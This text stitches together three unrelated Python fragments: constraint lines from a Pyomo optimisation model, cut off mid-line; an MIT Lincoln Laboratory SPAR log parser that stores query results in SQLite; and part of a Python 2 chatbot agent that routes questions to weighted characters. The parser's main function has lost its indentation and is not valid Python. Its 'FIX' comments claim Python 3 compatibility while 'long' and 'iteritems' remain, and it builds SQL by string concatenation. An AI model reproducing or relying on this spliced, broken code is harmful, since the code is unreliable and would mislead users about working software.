m.c816 = Constraint(expr= m.b93 - m.b114 + m.b126 <= 1)
m.c817 = Constraint(expr= m.b93 - m.b116 + m.b127 <= 1)
m.c818 = Constraint(expr= m.b96 - m.b98 + m.b128 <= 1)
m.c819 = Constraint(expr= m.b96 - m.b100 + m.b129 <= 1)
m.c820 = Constraint(expr= m.b96 - m.b102 + m.b130 <= 1)
m.c821 = Constraint(expr= m.b96 - m.b104 + m.b131 <= 1)
m.c822 = Constraint(expr= m.b96 - m.b106 + m.b132 <= 1)
m.c823 = Constraint(expr= m.b96 - m.b108 + m.b133 <= 1)
m.c824 = Constraint(expr= m.b96 - m.b110 + m.b134 <= 1)
m.c825 = Constraint(expr= m.b96 - m.b112 + m.b135 <= 1)
m.c826 = Constraint(expr= m.b96 - m.b114 + m.b136 <= 1)
m.c827 = Constraint(expr= m.b96 - m.b116 + m.b137 <= 1)
m.c828 = Constraint(expr= m.b98 - m.b100 + m.b138 <= 1)
m.c829 = Constraint(expr= m.b98 - m.b102 + m.b139 <= 1)
m.c830 = Constraint(expr= m.b98 - m.b104 + m.b140 <= 1)
m.c831 = Constraint(expr= m.b98 - m.b106 + m.b141 <= 1)
m.c832 = Constraint(expr= m.b98 - m.b108 + m.b142 <= 1)
m.c833 = Constraint(expr= m.b98 - m.b110 + m.b143 <= 1)
m.c834 = Constraint(expr= m.b98 - m.b112 + m.b144 <= 1)
m.c835 = Constraint(expr= m.b98 - m.b114 + m.b145 <= 1)
m.c836 = Constraint(expr= m.b98 - m.b116 + m.b146 <= 1)
m.c837 = Constraint(expr= m.b100 - m.b102 + m.b147 <= 1)
m.c838 = Constraint(expr= m.b100 - m.b104 + m.b148 <= 1)
m.c839 = Constraint(expr= m.b100 - m.b106 + m.b149 <= 1)
m.c840 = Constraint(expr= m.b100 - m.b108 + m.b150 <= 1)
m.c841 = Constraint(expr= m.b100 - m.b110 + m.b151 <= 1)
m.c842 = Constraint(expr= m.b100 - m.b112 + m.b152 <= 1)
m.c843 = Constraint(expr= m.b100 - m.b114 + m.b153 <= 1)
m.c844 = Constraint(expr= m.b100 - m.b116 + m.b154 <= 1)
m.c845 = Constraint(expr= m.b102 - m.b104 + m.b155 <= 1)
m.c846 = Constraint(expr= m.b102 - m.b106 + m.b156 <= 1)
m.c847 = Constraint(expr= m.b102 - m.b108 + m.b157 <= 1)
m.c848 = Constraint(expr= m.b102 - m.b110 + m.b158 <= 1)
m.c849 = Constraint(expr= m.b102 - m.b112 + m.b159 <= 1)
m.c850 = Constraint(expr= m.b102 - m.b114 + m.b160 <= 1)
m.c851 = Constraint(expr= m.b102 - m.b116 + m.b161 <= 1)
m.c852 = Constraint(expr= m.b104 - m.b106 + m.b162 <= 1)
m.c853 = Constraint(expr= m.b104 - m.b108 + m.b163 <= 1)
m.c854 = Constraint(expr= m.b104 - m.b110 + m.b164 <= 1)
m.c855 = Constraint(expr= m.b104 - m.b112 + m.b165 <= 1)
m.c856 = Constraint(expr= m.b104 - m.b114 + m.b166 <= 1)
m.c857 = Constraint(expr= m.b104 - m.b116 + m.b167 <= 1)
m.c858 = Constraint(expr= m.b106 - m.b108 + m.b168 <= 1)
m.c859 = Constraint(expr= m.b106 - m.b110 + m.b169 <= 1)
m.c860 = Constraint(expr= m.b106 - m.b112 + m.b170 <= 1)
m.c861 = Constraint(expr= m.b106 - m.b114 + m.b171 <= 1)
m.c862 = Constraint(expr= m.b106 - m.b116 + m.b172 <= 1)
m.c863 = Constraint(expr= m.b108 - m.b110 + m.b173 <= 1)
m.c864 = Constraint(expr= m.b108 - m.b112 + m.b174 <= 1)
m.c865 = Constraint(expr= m.b108 - m.b114 + m.b175 <= 1)
m.c866 = Constraint(expr= m.b108 - m.b116 + m.b176 <= 1)
m.c867 = Constraint(expr= m.b110 - m.b112 + m.b177 <= 1)
m.c868 = Constraint(expr= m.b110 - m.b114 + m.b178 <= 1)
m.c869 = Constraint(expr= m.b110 - m.b116 + m.b179 <= 1)
m.c870 = Constraint(expr= m.b112 - m.b114 + m.b180 <= 1)
m.c871 = Constraint(expr= m.b112 - m.b116 + m.b181 <= 1)
m.c872 = Constraint(expr= m.b114 - m.b116 + m.b182 <= 1)
m.c873 = Constraint(expr= m.b117 - m.b118 + m.b128 <= 1)
m.c874 = Constraint(expr= m.b117 - m.b119 + m.b129 <= 1)
m.c875 = Constraint(expr= m.b117 - m.b120 + m.b130 <= 1)
m.c876 = Constraint(expr= m.b117 - m.b121 + m.b131 <= 1)
m.c877 = Constraint(expr= m.b117 - m.b122 + m.b132 <= 1)
m.c878 = Constraint(expr= m.b117 - m.b123 + m.b133 <= 1)
m.c879 = Constraint(expr= m.b117 - m.b124 + m.b134 <= 1)
m.c880 = Constraint(expr= m.b117 - m.b125 + m.b135 <= 1)
m.c881 = Constraint(expr= m.b117 - m.b126 + m.b136 <= 1)
m.c882 = Constraint(expr= m.b117 - m.b127 + m.b137 <= 1)
m.c883 = Constraint(expr= m.b118 - m.b119 + m.b138 <= 1)
m.c884 = Constraint(expr= m.b118 - m.b120 + m.b139 <= 1)
m.c885 = Constraint(expr= m.b118 - m.b121 + m.b140 <= 1)
m.c886 = Constraint(expr= m.b118 - m.b122 + m.b141 <= 1)
m.c887 = Constraint(expr= m.b118 - m.b123 + m.b142 <= 1)
m.c888 = Constraint(expr= m.b118 - m.b124 + m.b143 <= 1)
m.c889 = Constraint(expr= m.b118 - m.b125 + m.b144 <= 1)
m.c890 = Constraint(expr= m.b118 - m.b126 + m.b145 <= 1)
m.c891 = Constraint(expr= m.b118 - m.b127 + m.b146 <= 1)
m.c892 = Constraint(expr= m.b119 - m.b120 + m.b147 <= 1)
m.c893 = Constraint(expr= m.b119 - m.b121 + m.b148 <= 1)
m.c894 = Constraint(expr= m.b119 - m.b122 + m.b149 <= 1)
m.c895 = Constraint(expr= m.b119 - m.b123 + m.b150 <= 1)
m.c896 = Constraint(expr= m.b119 - m.b124 + m.b151 <= 1)
m.c897 = Constraint(expr= m.b119 - m.b125 + m.b152 <= 1)
m.c898 = Constraint(expr= m.b119 - m.b126 + m.b153 <= 1)
m.c899 = Constraint(expr= m.b119 - m.b127 + m.b154 <= 1)
m.c900 = Constraint(expr= m.b120 - m.b121 + m.b155 <= 1)
m.c901 = Constraint(expr= m.b120 - m.b122 + m.b156 <= 1)
m.c902 = Constraint(expr= m.b120 - m.b123 + m.b157 <= 1)
m.c903 = Constraint(expr= m.b120 - m.b124 + m.b158 <= 1)
m.c904 = Constraint(expr= m.b120 - m.b125 + m.b159 <= 1)
m.c905 = Constraint(expr= m.b120 - m.b126 + m.b160 <= 1)
m.c906 | |
# *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: <NAME>
# Description: Parser for the perfomer queries log file.
# Results are stored in a DB.
# *****************************************************************
import argparse
import logging
import re
import collections
import sqlite3
import os
import sys
this_dir = os.path.dirname(os.path.realpath(__file__))
base_dir = os.path.join(this_dir, '..', '..', '..')
sys.path.append(base_dir)
import spar_python.report_generation.ta1.ta1_database as ta1_database
import spar_python.report_generation.ta1.ta1_schema as ta1_schema
import spar_python.analytics.common.log_parser_util as log_parser_util
from spar_python.perf_monitoring.create_perf_graphs import PerfGraphGenerator
# Module-level logger for this parser.
LOGGER = logging.getLogger(__name__)
# FIX: all regex patterns are now raw strings so sequences such as \w,
# \d, \[ and \. are regex escapes rather than (invalid) string escapes,
# which raise SyntaxWarning/DeprecationWarning on modern Python.
FILE_PATTERN = re.compile(r'^(Unloaded|VariableDelay)QueryRunner-\w+')
# "[<epoch seconds>] <message>"
TIME_PATTERN = re.compile(r'\[(?P<timestamp>[0-9]+\.[0-9]+)\] '
                          r'(?P<message>.*)')
# "<date> <time> <performer>-<...>-<tc_id>_..."
TC_PATTERN = re.compile(r'[0-9-]{10} [0-9:]{8} (?P<performer>[^-]+)-[^-]+-'
                        r'(?P<tc_id>[^_]+)_.+')
SENT_PATTERN = re.compile(r'ID (?P<cmd_id>[0-9]+-[0-9]+) sent')
COMMAND_PATTERN = re.compile(r'ID (?P<cmd_id>[0-9]+-[0-9]+) '
                             r'QID (?P<qid>[0-9]+): '
                             r'\[\[SELECT (?P<cols>.+) FROM main '
                             r'WHERE (?P<query>.*)\]\]')
RESULTS_PATTERN = re.compile(r'ID (?P<cmd_id>[0-9]+-[0-9]+) results:')
FAIL_PATTERN = re.compile(r'FAILED.*')
HASH_PATTERN = re.compile(r'(?P<result_id>[0-9]+) (?P<result_hash>[0-9a-f]+)')
EVENT_PATTERN = re.compile(r'ID (?P<cmd_id>[0-9]+-[0-9]+) event '
                           r'(?P<event_id>[0-9]+)( with value \[\['
                           r'(?P<event_val>[\d]+)\]\])? occurred')
ENDLOG_PATTERN = re.compile(r'END_OF_LOG')
class Rex:
    """Run a regular expression and keep the MatchObject for later use.

    Enables clean if/elif chains over several patterns with different
    named groups::

        if rex.pmatch(PATTERN_A, line):
            value = rex.m.group('a')
        elif rex.pmatch(PATTERN_B, line):
            value = rex.m.group('b')
    """

    def __init__(self):
        # Most recent MatchObject, or None if the last match failed.
        self.m = None

    def pmatch(self, regex, line):
        """Match ``regex`` against ``line``; store the result and
        return True on success, False otherwise."""
        self.m = regex.match(line)
        return self.m is not None
def get_global_id(cmd_id):
    """Return the global portion (text before the first '-') of a command id."""
    head = cmd_id.split('-')[0]
    assert head
    return head
def process_matches(matches):
    """Sort and separate the dict of row-id -> hash pairs.

    Keys may be ints or numeric strings; they are ordered numerically.
    Returns (id_list, hash_list): the ids as strings in numeric order,
    and the non-empty hashes in that same order.

    FIX: the sort key is ``int`` instead of the Python-2-only ``long``;
    on Python 2 ``int()`` auto-promotes to long, so ordering is
    unchanged, and the function now also works on Python 3.
    """
    id_list = []
    hash_list = []
    for row_id in sorted(matches, key=int):
        id_list.append(str(row_id))
        if matches[row_id] != '':
            hash_list.append(matches[row_id])
    return (id_list, hash_list)
def process_query(log_parser, query, cmd_id, matches, events, results_db, record_func, flags):
    """Finalize a parsed query record and hand it to ``record_func``.

    Verifies the command was actually sent, folds in matched record
    ids/hashes and event messages, tags the modification/throughput
    flags, then returns whatever ``record_func`` returns. Returns False
    when the command was never sent.
    """
    required = [ta1_schema.DBP_SELECTIONCOLS, ta1_schema.DBP_SENDTIME]
    if not log_parser.verify_result(query, required):
        LOGGER.error('No evidence of command %s ever being sent',
                     cmd_id)
        return False
    (result_ids, result_hashes) = process_matches(matches)
    (event_ts, event_ids, event_vals) = log_parser.process_events(events)
    query[ta1_schema.DBP_RETURNEDRECORDHASHES] = result_hashes
    query[ta1_schema.DBP_RETURNEDRECORDIDS] = result_ids
    query[ta1_schema.DBP_EVENTMSGTIMES] = event_ts
    query[ta1_schema.DBP_EVENTMSGIDS] = event_ids
    query[ta1_schema.DBP_EVENTMSGVALS] = event_vals
    query[ta1_schema.DBP_ISMODIFICATIONQUERY] = 1 if flags['mod'] else 0
    query[ta1_schema.DBP_ISTHROUGHPUTQUERY] = 1 if flags['throughput'] else 0
    # Apply record_func to the complete query and return its result.
    return record_func(query, cmd_id, results_db)
def append_baseline_matches(qid, cmd_id, matches, baseline_matches):
    """Record one modification query's match set under its qid.

    ``baseline_matches`` maps qid -> list of dicts with 'global_id' and
    'matches' fields. Once every log file is parsed, each qid should
    hold exactly two entries: the pre-modification query results (the
    one with the smaller global id) and the post-modification results
    (the larger global id).
    """
    # Inlined get_global_id(): the text before the first '-'.
    global_id = cmd_id.split('-')[0]
    assert global_id
    baseline_matches[qid].append({'global_id': global_id,
                                  'matches': matches})
def process_baseline_matches(all_baseline_matches, results_db):
    """Fill in the mods-to-mod-queries join table record/hash fields.

    ``all_baseline_matches`` maps qid -> list of two dicts (as built by
    append_baseline_matches): the pre-modification results and the
    post-modification results. Each qid's row in the M2MQ join table is
    updated with the pipe-delimited pre/post matching record ids and
    hashes. Entries without exactly two logs are skipped with a warning.
    """
    for qid, data in all_baseline_matches.iteritems():
        if len(data) != 2:
            LOGGER.warning("QID %d does not have 2 modification logs. "
                           "Instead it has %d logs. It should have a "
                           "pre modification log and a post modification "
                           "log. Skipping it", qid, len(data))
            continue
        # pre should be the entry with the lowest global (command) id.
        pre_index = 0
        post_index = 1
        # FIX: entries of `data` are plain dicts appended by
        # append_baseline_matches, so they are indexed directly; the
        # previous code's data[...][0] raised KeyError(0).
        # NOTE(review): global_id is a string, so this is a
        # lexicographic comparison -- confirm ids are fixed-width or
        # otherwise comparable as strings.
        if data[pre_index]['global_id'] > data[post_index]['global_id']:
            pre_index = 1
            post_index = 0
        (pre_ids, pre_hashes) = process_matches(data[pre_index]['matches'])
        (post_ids, post_hashes) = process_matches(data[post_index]['matches'])
        # Update this qid's join-table row (see ta1_schema M2MQ_* names).
        cmd = 'UPDATE ' + ta1_schema.M2MQ_TABLENAME + ' SET ' + \
              ta1_schema.M2MQ_PREIDS + '=' + \
              '\'' + '|'.join(pre_ids) + '\'' + \
              ', ' + \
              ta1_schema.M2MQ_PREHASHES + '=' + \
              '\'' + '|'.join(pre_hashes) + '\'' + \
              ', ' + \
              ta1_schema.M2MQ_POSTIDS + '=' + \
              '\'' + '|'.join(post_ids) + '\'' + \
              ', ' + \
              ta1_schema.M2MQ_POSTHASHES + '=' + \
              '\'' + '|'.join(post_hashes) + '\'' + \
              ' WHERE ' + ta1_schema.M2MQ_QID + '=' + str(qid)
        results_db._execute(cmd)
def parse_queries(log_parser, in_file, record_func, results_db, flags):
"""Main function that parses a log file, and applies record_func to each
complete record of query information. record_func can be used to do any
number of things, including updating a sqlite database, or writing out
results to a *.csv file. Returns the number of *new* records processed.
"""
num_records = 0
rex_obj = Rex()
temp_query_dict = collections.defaultdict(dict)
tc_id = '000'
performer = 'PERF'
results = {'flag' : False, 'cmd_id' : ''}
matches = {}
events_dict = collections.defaultdict(dict)
cmd_id = ''
baseline_matches = collections.defaultdict(list)
for line in in_file:
# Strip EOL
line = line.strip()
# Skip blank lines
if len(line) == 0:
continue
LOGGER.debug('Parsing %s...', line)
if (rex_obj.pmatch(TIME_PATTERN, line)):
# Found a timestamped line
timestamp = repr(float(rex_obj.m.group('timestamp')))
res = rex_obj.m.group('message')
if results['flag']:
if (rex_obj.pmatch(EVENT_PATTERN, res)):
# Found an event
cmd_id = rex_obj.m.group('cmd_id')
event_id = rex_obj.m.group('event_id')
event_val = rex_obj.m.group('event_val')
if (cmd_id not in temp_query_dict.keys()) or \
(ta1_schema.DBP_SENDTIME not in temp_query_dict[cmd_id]):
# Event is for an invalid command, one that was not
# sent yet, or one that finished; it's not valid.
LOGGER.warning('Found an invalid event for ' +\
'command id = %s ', cmd_id)
else:
# Event is for another valid command
events_dict[cmd_id].update({timestamp : [event_id, \
event_val]})
continue
else: # The END_OF_LOG case will **not** hit here
# The line has a timestamp and it's not an event so the
# results are done.
results_cmd_id = results['cmd_id']
if flags['baseline']:
# special for baseline mods; save all query data
qid = temp_query_dict[results_cmd_id][ta1_schema.DBP_FQID]
append_baseline_matches(qid,
results_cmd_id, matches,
baseline_matches)
else:
if process_query(log_parser, \
temp_query_dict[results_cmd_id], \
results_cmd_id, matches, \
events_dict[results_cmd_id], \
results_db, \
record_func, flags):
num_records += 1
# Conserve memory by deleting the unneeded entry in
# temp_query_dict. This is also necessary to keep track of
# valid cmd_id's for eventmsg collecting.
del temp_query_dict[results_cmd_id]
#clear results flag keep going
results['flag'] = False
results['cmd_id'] = ''
else:
if results['flag']:
# Grab results
if (rex_obj.pmatch(FAIL_PATTERN, line)):
LOGGER.warning('Command %s had FAILED results',
results['cmd_id'])
# If we had a previous failure in this query, add the new
# failure message to the existing message
prev_fail_msg = temp_query_dict[results['cmd_id']] \
[ta1_schema.DBP_STATUS]
fail_msgs = []
if (prev_fail_msg):
fail_msgs = prev_fail_msg
fail_msgs.append('FAILED')
for line in in_file:
line = line.strip()
if line == 'ENDFAILED':
break
if (rex_obj.pmatch(TIME_PATTERN, line)):
timestamp = repr(float(rex_obj.m.group('timestamp')))
res = rex_obj.m.group('message')
if (rex_obj.pmatch(EVENT_PATTERN, res)):
# Found an event
cmd_id = rex_obj.m.group('cmd_id')
event_id = rex_obj.m.group('event_id')
event_val = rex_obj.m.group('event_val')
if (cmd_id not in temp_query_dict.keys()) or \
(ta1_schema.DBP_SENDTIME not in \
temp_query_dict[cmd_id]):
# Event is for an invalid command, one that
# was not sent yet, or one that finished;
# it's not valid.
LOGGER.warning('Found an invalid event ' +\
'for command id = %s ', \
cmd_id)
else:
# Event is for another valid command
events_dict[cmd_id].update({timestamp : \
[event_id, event_val]})
else:
# Found timestamped line before ENDFAILED
LOGGER.warning('Found a timestamped line ' +\
'before ENDFAILED for command ' +\
'id = %s ', results[cmd_id])
else:
fail_msgs.append(line)
temp_query_dict[results['cmd_id']].update(
{ta1_schema.DBP_STATUS : fail_msgs})
elif (rex_obj.pmatch(HASH_PATTERN, line)):
# Else, add relevant data if there is both a row and a hash
matches[long(rex_obj.m.group('result_id'))] = \
rex_obj.m.group('result_hash')
else:
# Else, add only row
matches[line] = ''
else:
# Skip it
LOGGER.warning("Skipping line without timestamp: %s", line)
continue
# Continue to parse the timestamped line
if (rex_obj.pmatch(TC_PATTERN, res)):
# Found test case pattern
LOGGER.debug('Found testcase')
tc_id = rex_obj.m.group('tc_id')
performer = rex_obj.m.group('performer')
elif (rex_obj.pmatch(SENT_PATTERN, res)):
# Found sent pattern
LOGGER.debug('Found sent statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_PERFORMERNAME : performer,
ta1_schema.DBP_TESTCASEID : tc_id,
ta1_schema.DBP_SENDTIME : timestamp})
elif (rex_obj.pmatch(COMMAND_PATTERN, res)):
# Found command pattern
LOGGER.debug('Found command statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_PERFORMERNAME : performer,
ta1_schema.DBP_TESTCASEID : tc_id,
ta1_schema.DBP_FQID : long(rex_obj.m.group('qid')),
ta1_schema.DBP_SELECTIONCOLS : rex_obj.m.group('cols')})
elif (rex_obj.pmatch(RESULTS_PATTERN, res)):
# Found results pattern
LOGGER.debug('Found results statement')
cmd_id = rex_obj.m.group('cmd_id')
temp_query_dict[cmd_id].update(
{ta1_schema.DBP_RESULTSTIME : timestamp,
ta1_schema.DBP_STATUS : []})
# Calculate elapsed time
if ta1_schema.DBP_SENDTIME in | |
<filename>src/chatbot/server/chatbot_agent.py
# -*- coding: utf-8 -*-
import traceback
import logging
import random
import os
import re
import sys
import numpy as np
import datetime as dt
reload(sys)
sys.setdefaultencoding('utf-8')
import atexit
from collections import defaultdict, OrderedDict
from threading import RLock
# Global re-entrant lock guarding shared chatbot state.
sync = RLock()
# Status codes for chat request outcomes.
# NOTE(review): presumably returned to API clients -- confirm at the call
# sites below this chunk.
SUCCESS = 0
WRONG_CHARACTER_NAME = 1
NO_PATTERN_MATCH = 2
INVALID_SESSION = 3
INVALID_QUESTION = 4
TRANSLATE_ERROR = 5
logger = logging.getLogger('hr.chatbot.server.chatbot_agent')
from loader import load_characters, dyn_properties
from config import CHARACTER_PATH, RESET_SESSION_BY_HELLO, config
CHARACTERS = load_characters(CHARACTER_PATH)
REVISION = os.environ.get('HR_CHATBOT_REVISION')
LOCATION = dyn_properties.get('location')
IP = dyn_properties.get('ip')
from session import ChatSessionManager
session_manager = ChatSessionManager()
DISABLE_QUIBBLE = True
FALLBACK_LANG = 'en-US'
from chatbot.utils import (shorten, str_cleanup, get_weather, parse_weather,
do_translate, norm2)
from chatbot.words2num import words2num
from chatbot.server.character import TYPE_AIML, TYPE_CS
from operator import add, sub, mul, truediv, pow
import math
from chatbot.server.template import render
# Maps arithmetic control tokens (as emitted by the 'control' character)
# to the corresponding binary operator.
OPERATOR_MAP = {
    '[add]': add,
    '[sub]': sub,
    '[mul]': mul,
    '[div]': truediv,
    '[pow]': pow,
}
# Relative priority of cached response types; higher values win.
# NOTE(review): the selection logic consuming these weights is outside
# this chunk -- confirm semantics there.
RESPONSE_TYPE_WEIGHTS = {
    'pass': 100,
    'nogoodmatch': 50,
    'quibble': 40,
    'gambit': 50,
    'repeat': 0,
    'pickup': 0,
    'es': 20,
    'markov': 5,
}
def get_character(id, lang=None, ns=None):
    """Return the first character matching ``id`` (and optional ``ns``
    namespace and ``lang`` language), or None if there is no match."""
    for candidate in CHARACTERS:
        if candidate.id != id:
            continue
        if ns is not None and candidate.name != ns:
            continue
        if lang is None or lang in candidate.languages:
            return candidate
def add_character(character):
    """Register a new character; duplicates (by id) are rejected.

    Returns (success, message).
    """
    if any(c.id == character.id for c in CHARACTERS):
        # TODO: update the existing character instead of rejecting
        return False, "Character exists"
    CHARACTERS.append(character)
    return True, "Character added"
def is_local_character(character):
    """Return the character's ``local`` attribute (truthy if hosted locally)."""
    local = character.local
    return local
def get_characters_by_name(name, local=True, lang=None, user=None):
    """Return characters named ``name``, filtered by locality, language
    and owner.

    When ``user`` is given, ids shaped like '<owner>/<rest>' are kept
    only if owner == user; ids without exactly one '/' are always kept.
    Logs a warning when nothing matches.
    """
    pool = [c for c in CHARACTERS if c.name == name]
    if local:
        pool = [c for c in pool if is_local_character(c)]
    if lang is not None:
        pool = [c for c in pool if lang in c.languages]
    if user is None:
        characters = pool
    else:
        characters = []
        for c in pool:
            toks = c.id.split('/')
            if len(toks) == 2 and toks[0] != user:
                # Owned by a different user -- filter it out.
                continue
            characters.append(c)
    if not characters:
        logger.warn('No character is satisfied')
    return characters
def list_character(lang, sid):
    """List (name, id, weight, level, dynamic_level) for every character
    that can respond in this session; [] when the session is unknown."""
    sess = session_manager.get_session(sid)
    if sess is None:
        return []
    characters = get_responding_characters(lang, sid)
    pairs = zip(characters, get_weights(characters, sess))
    return [(c.name, c.id, w, c.level, c.dynamic_level) for c, w in pairs]
def list_character_names():
    """Return the unique character names, excluding the internal 'dummy'."""
    return list({c.name for c in CHARACTERS if c.name != 'dummy'})
def set_weights(param, lang, sid):
    """Set per-character weights for a session.

    ``param`` is either the literal 'reset' or a comma-separated list of
    '<index-or-id>=<weight>' pairs, each weight in [0, 1]. Numeric keys
    index into the responding-character list; other keys are treated as
    character ids. Returns (success, message).
    """
    sess = session_manager.get_session(sid)
    if sess is None:
        return False, "No session"
    if param == 'reset':
        sess.session_context.weights = {}
        return True, "Weights are reset"
    characters = get_responding_characters(lang, sid)
    weights = {}
    try:
        for assignment in param.split(','):
            key, value = assignment.split('=')
            value = float(value)
            if value > 1 or value < 0:
                return False, "Weight must be in the range [0, 1]"
            try:
                weights[characters[int(key)].id] = value
            except ValueError:
                # Key is a character id rather than a list index.
                weights[key] = value
    except Exception as ex:
        logger.error(ex)
        logger.error(traceback.format_exc())
        return False, "Wrong weight format"
    sess.session_context.weights = weights
    return True, "Weights are updated"
def get_weights(characters, sess):
    """Return one weight per character, preferring session overrides.

    Overrides live in ``sess.session_context.weights`` (id -> weight);
    characters without an override fall back to their own default.
    """
    overrides = getattr(sess.session_context, 'weights', None)
    if not overrides:
        return [c.weight for c in characters]
    return [overrides[c.id] if c.id in overrides else c.weight
            for c in characters]
def set_context(prop, sid):
    """Push context properties to every character for the given session.

    Best effort: characters that fail (or don't support context) are
    silently skipped. Returns (success, message).
    """
    sess = session_manager.get_session(sid)
    if sess is None:
        return False, "No session"
    for character in CHARACTERS:
        try:
            character.set_context(sess, prop)
        except Exception:
            pass
    return True, "Context is updated"
def remove_context(keys, sid):
    """Remove context keys from every AIML/CS character for the session.

    Best effort: failures are silently ignored. Returns (success, message).
    """
    sess = session_manager.get_session(sid)
    if sess is None:
        return False, "No session"
    for character in CHARACTERS:
        if character.type not in (TYPE_AIML, TYPE_CS):
            continue
        try:
            for key in keys:
                character.remove_context(sess, key)
        except Exception:
            pass
    return True, "Context is updated"
def get_context(sid, lang):
    """Collect the merged context of all stateful responding characters.

    Returns (True, context_dict) on success, or (False, message) when
    the session is unknown. Keys beginning with '_' are treated as
    private and stripped from the result. Per-character failures are
    logged and skipped.
    """
    sess = session_manager.get_session(sid)
    if sess is None:
        return False, "No session"
    characters = get_responding_characters(lang, sid)
    context = {}
    for c in characters:
        if not c.stateful:
            continue
        try:
            context.update(c.get_context(sess))
        except Exception as ex:
            logger.error("Get context error, {}".format(ex))
            logger.error(traceback.format_exc())
    # FIX: iterate over a snapshot of the keys -- deleting from a dict
    # while iterating its live key view raises RuntimeError on Python 3.
    for k in list(context.keys()):
        if k.startswith('_'):
            del context[k]
    return True, context
def update_config(**kwargs):
    """Update known config entries; unknown keys are logged and ignored.

    Unicode values are coerced to byte strings (Python 2). Returns
    (changed, message); changed is True when at least one known key was
    updated.
    """
    updated = []
    for key, value in kwargs.items():
        if key not in config:
            logger.warn("Unknown config {}".format(key))
            continue
        if isinstance(value, unicode):
            value = str(value)
        config[key] = value
        if key not in updated:
            updated.append(key)
    if not updated:
        return False, "No configuration is updated"
    logger.warn("Configuration is updated")
    for key in updated:
        logger.warn("{}={}".format(key, config[key]))
    return True, "Configuration is updated"
def preprocessing(question, lang, session, request_id=None):
    """Normalize a question before character matching.

    Lower-cases and trims the text, collapses consecutive whitespace,
    applies the 'sofia' -> 'sophia' spelling fix and, when a 'reduction'
    character is available, lets it rewrite the question.

    FIX: ``request_id`` was referenced but never defined, so any call
    with a 'reduction' character present raised NameError. It is now an
    optional parameter (default None), keeping existing 3-argument
    callers working.
    """
    question = question.lower().strip()
    question = ' '.join(question.split())  # collapse consecutive spaces
    question = question.replace('sofia', 'sophia')
    reduction = get_character('reduction')
    if reduction is not None:
        response = reduction.respond(
            question, lang, session, query=True, request_id=request_id)
        reducted_text = response.get('text')
        if reducted_text:
            question = reducted_text
    return question
def _ask_characters(characters, question, lang, sid, query, request_id, **kwargs):
sess = session_manager.get_session(sid)
if sess is None:
return
used_charaters = []
data = sess.session_context
user = getattr(data, 'user')
botname = getattr(data, 'botname')
weights = get_weights(characters, sess)
weighted_characters = zip(characters, weights)
weighted_characters = [wc for wc in weighted_characters if wc[1]>0]
logger.info("Weights {}".format(weights))
_question = preprocessing(question, lang, sess)
response = {}
hit_character = None
answer = None
cross_trace = []
cached_responses = defaultdict(list)
control = get_character('control')
if control is not None:
_response = control.respond(_question, lang, sess, query, request_id)
_answer = _response.get('text')
if _answer == '[tell me more]':
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
if sess.last_used_character:
if sess.cache.that_question is None:
sess.cache.that_question = sess.cache.last_question
context = sess.last_used_character.get_context(sess)
if 'continue' in context and context.get('continue'):
_answer, res = shorten(context.get('continue'), 140)
response['text'] = answer = _answer
response['botid'] = sess.last_used_character.id
response['botname'] = sess.last_used_character.name
sess.last_used_character.set_context(sess, {'continue': res})
hit_character = sess.last_used_character
cross_trace.append((sess.last_used_character.id, 'continuation', 'Non-empty'))
else:
_question = sess.cache.that_question.lower().strip()
cross_trace.append((sess.last_used_character.id, 'continuation', 'Empty'))
elif _answer.startswith('[weather]'):
template = _answer.replace('[weather]', '')
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
context = control.get_context(sess)
if context:
location = context.get('querylocation')
prop = parse_weather(get_weather(location))
if prop:
try:
_answer = template.format(location=location, **prop)
if _answer:
answer = _answer
response['text'] = _answer
response['botid'] = control.id
response['botname'] = control.name
except Exception as ex:
cross_trace.append((control.id, 'control', 'No answer'))
logger.error(ex)
logger.error(traceback.format_exc())
else:
cross_trace.append((control.id, 'control', 'No answer'))
elif _answer in OPERATOR_MAP.keys():
opt = OPERATOR_MAP[_answer]
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
context = control.get_context(sess)
if context:
item1 = context.get('item1')
item2 = context.get('item2')
item1 = words2num(item1)
item2 = words2num(item2)
if item1 is not None and item2 is not None:
try:
result = opt(item1, item2)
img = math.modf(result)[0]
if img < 1e-6:
result_str = '{:d}'.format(int(result))
else:
result_str = 'about {:.4f}'.format(result)
if result > 1e20:
answer = "The number is too big. You should use a calculator."
else:
answer = "The answer is {result}".format(result=result_str)
except ZeroDivisionError:
answer = "Oh, the answer is not a number"
except Exception as ex:
logger.error(ex)
logger.error(traceback.format_exc())
answer = "Sorry, something goes wrong. I can't calculate it."
response['text'] = answer
response['botid'] = control.id
response['botname'] = control.name
else:
cross_trace.append((control.id, 'control', 'No answer'))
else:
if _answer and not re.findall(r'\[.*\].*', _answer):
cross_trace.append((control.id, 'control', _response.get('trace') or 'No trace'))
hit_character = control
answer = _answer
response = _response
else:
cross_trace.append((control.id, 'control', 'No answer'))
for c in characters:
try:
c.remove_context(sess, 'continue')
except NotImplementedError:
pass
sess.cache.that_question = None
def _ask_character(stage, character, weight, good_match=False, reuse=False):
logger.info("Asking character {} \"{}\" in stage {}".format(
character.id, _question, stage))
if not reuse and character.id in used_charaters:
cross_trace.append((character.id, stage, 'Skip used tier'))
return False, None, None
if character.id in used_charaters and character.type == TYPE_CS:
cross_trace.append((character.id, stage, 'Skip CS tier'))
return False, None, None
used_charaters.append(character.id)
answer = None
answered = False
if weight == 0:
cross_trace.append((character.id, stage, 'Disabled'))
logger.warn("Character \"{}\" in stage {} is disabled".format(
character.id, stage))
return False, None, None
response = character.respond(_question, lang, sess, query, request_id)
answer = str_cleanup(response.get('text', ''))
trace = response.get('trace')
if answer:
if 'pickup' in character.id:
cached_responses['pickup'].append((response, answer, character))
return False, None, None
if good_match:
if response.get('exact_match') or response.get('ok_match'):
if response.get('gambit'):
if random.random() < 0.3:
logger.info("{} has gambit but dismissed".format(character.id))
cross_trace.append((character.id, stage, 'Ignore gambit answer. Answer: {}, Trace: {}'.format(answer, trace)))
cached_responses['gambit'].append((response, answer, character))
else:
logger.info("{} has gambit".format(character.id))
answered = True
else:
logger.info("{} has good match".format(character.id))
answered = True
else:
if not response.get('bad'):
